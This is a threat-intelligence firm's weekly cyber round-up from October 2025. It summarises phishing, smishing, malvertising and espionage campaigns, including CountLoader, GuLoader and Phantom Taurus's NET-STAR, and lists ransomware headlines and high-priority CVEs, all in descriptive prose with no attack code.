2025 Handbook: How to build a requirements-driven intelligence program

Download

Weekly Cyber Round-up

Intelligence Report

October 2, 2025

Phishing campaign leveraging SVG files targets Ukraine with CountLoader, Amatera and PureMiner

Fortinet researchers observed an email phishing campaign impersonating the National Police of Ukraine and leveraging SVG files to deliver malware against targeted Ukrainian systems. Once opened, the SVG attachments initiate the download of a password-protected archive under the guise of an Adobe Reader interface, which contains a Compiled HTML Help file, triggering an infection chain via CountLoader to ultimately install Amatera Stealer and PureMiner. Amatera Stealer and PureMiner are executed via .NET Ahead-of-Time compilation with process hollowing or loaded directly into memory via PythonMemoryModule. When executed, Amatera creates a mutex with hardcoded values before connecting to a remote server and issuing GET requests to obtain a configuration file. The stealer gathers system information, Gecko-based application related files, Chromium-based application files, desktop wallets, and more. A more recent campaign only delivered Amatera and featured stronger obfuscation techniques during the delivery stage.  

Get the alert delivered directly to your inbox

Smishing campaign exploits cellular router APIs to target Europe

Since July 22nd, 2025, Sekoia researchers have observed the exploitation of a cellular router’s API to send smishing messages, with Belgium being the most likely target. The phishing URLs typosquat well-known Belgian government platforms, namely CSAM and eBox, with messages written in both Dutch and French. The campaign likely specifically targets Milesight industrial cellular routers, with over 19,000 routers exposed online and at least 572 potentially vulnerable, nearly half of which are located in Europe. Honeypot logs revealed that the attackers use an authentication cookie to gain access to router APIs, suggesting they have valid credentials. The credentials may have been obtained through CVE-2023-43261, which affects several Milesight routers, however misconfigurations may also have been used to access the SMS router API and send smishing messages. Most vulnerable routers are running outdated firmware, with versions 32.2.x.x and 32.3.x.x the most observed, though two devices were identified as running more recent versions, specifically 41.0.0.2 and 41.0.0.3. The campaign has been active since at least February 2022, with campaigns targeting France, Sweden, Italy, Singapore, Norway, Portugal, and Hungary also observed. 

TradingView malvertising campaign migrates to Google Ads and YouTube

Bitdefender researchers observed a malicious campaign initially leveraging Facebook Ads to provide ‘free access’ to TradingView Premium and other trading or financial platforms now leveraging YouTube and Google Ads for distribution. The threat actors have hijacked the Google advertiser account associated with a Norwegian design agency, with the actors separately hijacking a YouTube account to direct victims via the Google Ads system. The channel posts unlisted videos featuring a link that redirects victims to pages designed to download malware or harvest credentials. The malware distributed in the campaign features similarities to that distributed in previous instances, with the new sample communicating via WebSocket on port 30000 and the ‘/config’ route. The initial downloader is custom-built to resist detection analysis and uses techniques consistent with past infostealer campaigns. The malware uses PostHog for user tracking and establishes persistence by creating a Scheduled Task, enabling it to add Windows Defender exclusions and ultimately download and execute JSCEAL.

GuLoader campaign targets businesses in French speaking countries with MassLogger

Symantec researchers observed a new GuLoader campaign in which threat actors are impersonating a well-known hospitality and luxury resort/events group in Morocco in an attempt to deploy the MassLogger stealer. The campaign sends fraudulent quotation request emails that contain a malicious BZ archive containing a VBS script. Upon execution, the script initiates the GuLoader infection chain, ultimately leading to the installation of MassLogger. The campaign primarily targets organizations across French-speaking countries, including France, Morocco, Tunisia, Belgium, and Madagascar, with additional activity observed against entities in broader Europe and beyond. The campaign targets multiple sectors, including finance and banking, insurance, automotive manufacturing and distribution, industrial equipment and engineering, and more. 

Phantom Taurus targets critical organizations using NET-STAR malware suite

Palo Alto Networks Unit 42 researchers detailed the recent activity of the China-nexus advanced persistent threat actor, Phantom Taurus, which has been observed targeting government and telecommunication organizations across Africa, the Middle East, and Asia for the past two and a half years. Phantom Taurus’ main focus includes ministries of foreign affairs, embassies, geopolitical events, and military operations, with espionage the primary objective. Phantom Taurus has recently shifted from email server compromise to the direct targeting of databases, with the group observed leveraging Windows Management Instrumentation to execute a batch script on remote SQL servers to search for documents related to countries such as Afghanistan and Pakistan. The group has also been observed using a new .NET malware suite, dubbed NET-STAR, to target IIS web servers. The suite consists of three web-based backdoors, including IIServerCore that supports in-memory execution of command-line arguments, arbitrary commands, and payloads, AssemblyExecuter V1, which loads and executes .NET payloads in memory, and AssemblyExecuter V2, which is equipped with Antimalware Scan Interface and Event Tracing for Windows bypass capabilities. The use of common tools such as China Chopper, the Potato suite, and Impacket, as well as customized tools like Specter malware has also been observed. 

Ransomware

Clop extortion emails claim theft of Oracle E-Business Suite dataBleeping Computer – Oct 02 2025Akira Ransomware Group Claims Eleven New VictimsDaily Dark Web – Sep 30 2025New LockBit 5.0 Targets Windows, Linux, ESXi Trend Micro Simply Security – Sep 25 2025Ransom Tales: Volume IV – Emulating Rhysida, Charon and Dire Wolf RansomwareSecurity Boulevard – Sep 25 2025Where Are my Keys?! Ransomware Group Steals AWS Keys to AdvanceVaronis Blog – Sep 25 2025

Financial Services

New Android Banking Trojan “Klopatra” Uses Hidden VNC to Control Infected SmartphonesThe Hacker News – Oct 01 2025Datzbro: RAT Hiding Behind Senior Travel ScamsThreat Fabric Blog – Sep 30 2025UK convicts “Bitcoin Queen” in world’s largest cryptocurrency seizureBleeping Computer – Sep 29 2025273,000 Indian Bank Transfer Records Exposed in National Automated Clearing House Cloud Server LeakTechNadu – Sep 26 2025Ukrainian cyber experts cripple Russia’s fast payment banking system – sourceUkrayinska Pravda – Sep 25 2025

Geopolitics

Ukraine Warns of CABINETRAT Backdoor + XLL Add-ins Spread via Signal ZIPsThe Hacker News – Oct 01 2025Moldova Election Hit by Cyberattacks Amid Political Tensions, Blocking 4,000 Vote-Related WebsitesTechNadu – Sep 29 2025Anonymous TikTok accounts backing radical parties before Czech vote, study findsReuters – Sep 28 2025Two Dutch teens arrested in rare Russian espionage caseNL Times – Sep 26 2025Iran Claims Major Leak of Israeli Nuclear Program DataDaily Dark Web – Sep 25 2025

High Priority Vulnerabilities

Name Software Base
Score
Temp
Score
CVE-2025-20333 Firepower Threat Defense 9.9 8.4
Related: RayInitiator and LINE VIPER used in zero-day attacks on Cisco ASA firewalls
CVE-2025-41244 Telco Cloud Infrastructure 7.8 7.5
Related: You name it, VMware elevates it (CVE-2025-41244)
CVE-2025-56383 Notepad++ 8.4 6.8
Related: PoC exploit published for zero-day DLL hijacking flaw in Notepad++
CVE-2025-10035 GoAnywhere MFT 10.0 9.8
Related: Critical Fortra GoAnywhere flaw exploited in the wild prior to disclosure
CVE-2021-21311 Adminer 7.3 7.0
Related: High-severity Adminer SSRF flaw among actively exploited vulnerabilities

Get the full report
delivered to your inbox

By filling out and submitting this request you give us your consent to use and store the information you have provided for the purpose set out above or in connection with it. For more information, see our Privacy Policy.